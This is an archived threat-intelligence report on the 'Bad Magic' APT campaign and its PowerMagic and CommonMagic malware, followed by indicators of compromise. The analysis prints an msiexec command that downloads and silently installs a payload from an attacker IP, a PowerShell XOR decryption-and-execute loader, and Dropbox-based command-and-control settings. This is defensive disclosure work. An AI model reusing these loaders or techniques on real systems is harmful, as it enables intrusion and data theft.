{ "id": "1d9768f1-83b2-441a-a706-fc52fd852305", "created_at": "2026-04-06T00:15:31.127639Z", "updated_at": "2026-04-10T03:25:40.963919Z", "deleted_at": null, "sha1_hash": "df3c957abf55f1dfec748041bb0cd4ba10bcf8b6", "title": "Bad magic: new APT found in the area of Russo-Ukrainian conflict", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1492130, "plain_text": "Bad magic: new APT found in the area of Russo-Ukrainian conflict\r\nBy Leonid Bezvershenko\r\nPublished: 2023-03-21 · Archived: 2026-04-05 15:18:56 UTC\r\nSince the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large\r\nhave identified a significant number of cyberattacks executed in a political and geopolitical context. We\r\npreviously published an overview of cyber activities and the threat landscape related to the conflict between\r\nRussia and Ukraine and continue to monitor new threats in these regions.\r\nIn October 2022, we identified an active infection of government, agriculture and transportation organizations\r\nlocated in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the\r\ndetails of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL\r\npointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:\r\nA decoy document (we discovered PDF, XLSX and DOCX versions)\r\nA malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened\r\nMalicious ZIP archive\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 1 of 10\n\nDecoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)\r\nIn several cases, the contents of the decoy document were directly related to the name of the malicious LNK to\r\ntrick the user into activating it. For example, one archive contained an LNK file named “Приказ Минфина ДНР\r\n№ 176.pdf.lnk” (Ministry of Finance Decree No. 176), and the decoy document explicitly referenced it by name in\r\nthe text.\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 2 of 10\n\nDecoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance\r\nDecree No. 176)\r\nThe ZIP files were downloaded from various locations hosted on two domains: webservice-srv[.]online and\r\nwebservice-srv1[.]online\r\nKnown attachment names, redacted to remove personal information:\r\nMD5 (name)\r\nFirst\r\ndetection\r\n0a95a985e6be0918fdb4bfabf0847b5a (новое отмена решений уик 288.zip)\r\n2021-09-22\r\n13:47\r\necb7af5771f4fe36a3065dc4d5516d84\r\n(внесение_изменений_в_отдельные_законодательные_акты_рф.zip)\r\n2022-04-28\r\n07:36\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 3 of 10\n\n765f45198cb8039079a28289eab761c5 (гражданин рб (redacted) .zip)\r\n2022-06-06\r\n11:40\r\nebaf3c6818bfc619ca2876abd6979f6d (цик 3638.zip)\r\n2022-08-05\r\n08:39\r\n1032986517836a8b1f87db954722a33f (сз 14-1519 от 10.08.22.zip)\r\n2022-08-12\r\n10:21\r\n1de44e8da621cdeb62825d367693c75e (приказ минфина днр № 176.zip)\r\n2022-09-23\r\n08:10\r\nWhen the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to\r\nthe infection of the computer with a previously unseen malicious framework that we named CommonMagic. The\r\nmalware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code\r\nhas no direct relation to any known campaigns.\r\nInfection chain\r\nInfection chain\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 4 of 10\n\nInstallation workflow\r\nThe malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the\r\nWindows Installer executable.\r\n%WINDIR%\\System32\\msiexec.exe /i\r\nhttp://185.166.217[.]184/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA/attachment.msi /quiet\r\nThe MSI file is effectively a dropper package, containing an encrypted next-stage payload (service_pack.dat), a\r\ndropper script (runservice_pack.vbs) and a decoy document that is supposed to be displayed to the victim.\r\nFiles contained in attachment.msi\r\nThe encrypted payload and the decoy document are written to the folder named %APPDATA%\\WinEventCom.\r\nThe VBS dropper script is, in turn, a wrapper for launching an embedded PowerShell script that decrypts the next\r\nstage using a simple one-byte XOR, launches it and deletes it from disk.\r\nDecryption of service_pack.dat\r\n1 $inst=\"$env:APPDATA\\WinEventCom\\service_pack.dat\";\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 5 of 10\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nif (!(Test-Path $inst)){\r\nreturn;\r\n}\r\n$binst=[System.IO.File]::ReadAllBytes($inst);\r\n$xbinst=New-Object Byte[] $binst.Count;\r\nfor ($i=0;$i-lt$binst.Count;$i++) {\r\n$xbinst[$i]=$binst[$i]-bxor0x13;\r\n$xbinst[$i]=$binst[$i]-bxor0x55;\r\n$xbinst[$i]=$binst[$i]-bxor0xFF;\r\n$xbinst[$i]=$binst[$i]-bxor0xFF;\r\n};\r\nTry {\r\n[System.Text.Encoding]::ASCII.GetString($xbinst)|iex;\r\n}\r\nCatch {};\r\nStart-Sleep 3;\r\nRemove-Item -Path $inst -Force\r\nThe next-stage script finalizes the installation: it opens the decoy document to display it to the user, writes two\r\nfiles named config and manutil.vbs to %APPDATA%\\WinEventCom, and creates a Task Scheduler job named\r\nWindowsActiveXTaskTrigger, to execute the wscript.exe%APPDATA%\\WinEventCom\\manutil.vbs\r\ncommand every day.\r\nThe PowerMagic backdoor\r\nThe script manutil.vbs, which is dropped by the initial package, is a loader for a previously unknown backdoor\r\nwritten in PowerShell that we named PowerMagic. The main body of the backdoor is read from the file\r\n%APPDATA%\\WinEventCom\\config and decrypted with a simple XOR (key: 0x10).\r\nSnippet of PowerMagic’s code containing the “powermagic” string\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 6 of 10\n\n$AppDir='powermagic';\r\n$ClinetDir='client';\r\n$ClinetTaskDir='task';\r\n$ClinetResultDir='result';\r\n$ClientToken=redacted\r\n$dbx_up='https://content.dropboxapi.com/2/files/upload';\r\n$dbx_down = 'https://content.dropboxapi.com/2/files/download';\r\nWhen started, the backdoor creates a mutex – WinEventCom. Then, it enters an infinite loop communicating with\r\nits C\u0026C server, receiving commands and uploading results in response. It uses OneDrive and Dropbox folders as\r\ntransport, and OAuth refresh tokens as credentials.\r\nEvery minute the backdoor performs the following actions:\r\n1. 1 Modifies the heartbeat file located at /$AppDir/$ClientDir/\u003cmachine UID\u003e (the values of the $AppDir\r\nand $ClientDir PowerShell variables may differ between samples). The contents of this file consist of the\r\nbackdoor PID and a number incremented by one with each file modification.\r\n2. 2 Downloads commands that are stored as a file in the /$AppDir/$ClientTaskDir directory.\r\n3. 3 Executes every command as a PowerShell script.\r\n4. 4 Uploads the output of the executed PowerShell command to the cloud storage, placing it in the\r\n/$AppDir/$ClientResultDir/\u003cvictim machine UUID\u003e.\u003ctimestamp\u003e file.\r\nThe CommonMagic framework\r\nAs it turned out, PowerMagic was not the only malicious toolkit used by the actor. All the victims of PowerMagic\r\nwere also infected with a more complicated, previously unseen, modular malicious framework that we named\r\nCommonMagic. This framework was deployed after initial infection with the PowerShell backdoor, leading us to\r\nbelieve that CommonMagic is deployed via PowerMagic.\r\nThe CommonMagic framework consists of several executable modules, all stored in the directory\r\nC:\\ProgramData\\CommonCommand. Modules start as standalone executable files and communicate via named\r\npipes. There are dedicated modules for interaction with the C\u0026C server, encryption and decryption of the C\u0026C\r\ntraffic and various malicious actions.\r\nThe diagram below illustrates the architecture of the framework.\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 7 of 10\n\nFramework architecture\r\nNetwork communication\r\nThe framework uses OneDrive remote folders as a transport. It utilizes the Microsoft Graph API using an OAuth\r\nrefresh token embedded into the module binary for authentication. The RapidJSON library is used for parsing\r\nJSON objects returned by the Graph API.\r\nA dedicated heartbeat thread updates the remote file \u003cvictim ID\u003e/S/S.txt every five minutes with the local\r\ntimestamp of the victim.\r\nThen, in separate threads, the network communication module downloads new executable modules from the\r\ndirectory \u003cvictim ID\u003e/M and uploads the results of their execution to the directory \u003cvictim ID\u003e/R.\r\nThe data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source\r\nlibrary. By default, this library uses the seven-byte sequence “RC5SIMP” at the beginning of the encrypted\r\nsequence, but the developers of the backdoor changed it to “Hwo7X8p”. Encryption is implemented in a separate\r\nprocess, communicating over the pipes named \\\\.\\pipe\\PipeMd and \\\\.\\pipe\\PipeCrDtMd.\r\nPlugins\r\nSo far, we have discovered two plugins implementing the malicious business logic. They are located in the\r\ndirectory C:\\ProgramData\\CommonCommand\\Other.\r\nScreenshot (S.exe) – takes screenshots every three seconds using the GDI API\r\nUSB (U.exe) – collects the contents of the files with the following extensions from connected USB\r\ndevices: .doc, .docx. .xls, .xlsx, .rtf, .odt, .ods, .zip, .rar, .txt, .pdf.\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 8 of 10\n\nTo be continued\r\nSo far, we have found no direct links between the samples and data used in this campaign and any previously\r\nknown actors. However, the campaign is still active, and our investigation continues. So, we believe that further\r\ndiscoveries may reveal additional information about this malware and the threat actor behind it.\r\nCommonMagic indicators of compromise\r\nLure archives\r\n0a95a985e6be0918fdb4bfabf0847b5a новое отмена решений уик 288.zip (new cancellation of resolution local\r\nelection committee 288.zip)\r\necb7af5771f4fe36a3065dc4d5516d84 внесение_изменений_в_отдельные_законодательные_акты_рф.zip\r\n(making changes to several russian federation laws.zip)\r\n765f45198cb8039079a28289eab761c5 гражданин рб (redacted) .zip (citizen of republic of belarus (redacted).zip)\r\nebaf3c6818bfc619ca2876abd6979f6d цик 3638.zip (central election committee 3638.zip)\r\n1032986517836a8b1f87db954722a33f сз 14-1519 от 10.08.22.zip (memo 14-1519 dated 10.08.22.zip)\r\n1de44e8da621cdeb62825d367693c75e приказ минфина днр № 176.zip (dpr ministry of finance order #176.zip)\r\nPowerMagic installer\r\nfee3db5db8817e82b1af4cedafd2f346 attachment.msi\r\nPowerMagic dropper\r\nbec44b3194c78f6e858b1768c071c5db service_pack.dat\r\nPowerMagic loader\r\n8c2f5e7432f1e6ad22002991772d589b manutil.vbs\r\nPowerMagic backdoor\r\n1fe3a2502e330432f3cf37ca7acbffac\r\nCommonMagic loader\r\nce8d77af445e3a7c7e56a6ea53af8c0d All.exe\r\nCommonMagic cryptography module\r\n9e19fe5c3cf3e81f347dd78cf3c2e0c2 Clean.exe\r\nCommonMagic network communication module\r\n7c0e5627fd25c40374bc22035d3fadd8 Overall.exe\r\nDistribution servers\r\nwebservice-srv[.]online\r\nwebservice-srv1[.]online\r\n185.166.217[.]184\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 9 of 10\n\nSource: https://securelist.com/bad-magic-apt/109087/\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://securelist.com/bad-magic-apt/109087/" ], "report_names": [ "109087" ], "threat_actors": [ { "id": "3f918a1b-2f20-4f3f-ae16-31e83d9d91d9", "created_at": "2023-06-23T02:04:34.088425Z", "updated_at": "2026-04-10T02:00:04.573175Z", "deleted_at": null, "main_name": "Bad Magic", "aliases": [ "Bad Magic", "CloudWizard", "RedStinger" ], "source_name": "ETDA:Bad Magic", "tools": [ "CommonMagic", "PowerMagic" ], "source_id": "ETDA", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "ff5a7bd9-75a5-43fe-ba4c-27dab43e1f61", "created_at": "2023-11-07T02:00:07.086058Z", "updated_at": "2026-04-10T02:00:03.403516Z", "deleted_at": null, "main_name": "RedStinger", "aliases": [ "Bad Magic" ], "source_name": "MISPGALAXY:RedStinger", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434531, "ts_updated_at": 1775791540, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/df3c957abf55f1dfec748041bb0cd4ba10bcf8b6.pdf", "text": "https://archive.orkl.eu/df3c957abf55f1dfec748041bb0cd4ba10bcf8b6.txt", "img": "https://archive.orkl.eu/df3c957abf55f1dfec748041bb0cd4ba10bcf8b6.jpg" } }